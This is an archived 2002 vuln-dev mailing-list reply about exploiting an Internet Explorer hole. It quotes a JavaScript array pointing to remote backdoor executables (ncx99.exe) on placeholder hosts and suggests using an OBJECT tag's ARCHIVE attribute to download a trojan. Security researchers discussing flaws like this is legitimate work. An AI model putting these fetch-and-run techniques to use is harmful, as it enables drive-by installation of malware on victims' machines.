Re: Rather large MSIE-hole

From: Joerg Over (over@dexia.de)
Date: 03/15/02

• Previous message: Chad Thunberg: "RE: Rather large MSIE-hole"
• In reply to: KF: "Re: Rather large MSIE-hole"
• Next in thread: Slow2Show: "Re: Rather large MSIE-hole"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

---

Date: Fri, 15 Mar 2002 10:27:34 +0100
To: vuln-dev@securityfocus.com
From: Joerg Over <over@dexia.de>

Hello ...

What about, generally, not tackling the programName array trying to stuff
params into it, but the <OBJECT> instead?

At 17:48 14.03.02 -0500 you wrote:
->Another thought... will this bug run an executable from a web page? If
->so you could just make your own binary to do whatever you wanted. Like
->http://mysiteathome.com/malware.exe or something along those lines. I
->would HOPE that it asks to save the file to disk or even better ignore
->it all together. Maybe try something like:
->
->var programName=new Array(
-> 'http://mysiteathome.com/ncx99.exe',
-> 'http://someothersite.com/ncx99.exe',
->);

One could maybe try the <PARAM NAME=> - tag to pass parameters. Dunno how
that's transported to the object, though.
Another attempt might be using the ARCHIVE - attribute of the OBJECT to
download the trojan (or batchfile if you will, like has been proposed
here), so you don't need params.

greetings, -jo

---

• Previous message: Chad Thunberg: "RE: Rather large MSIE-hole"
• In reply to: KF: "Re: Rather large MSIE-hole"
• Next in thread: Slow2Show: "Re: Rather large MSIE-hole"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

We are proud to have Web Hosting and Rack Housing from 9 Net Avenue Deutschland.
(10)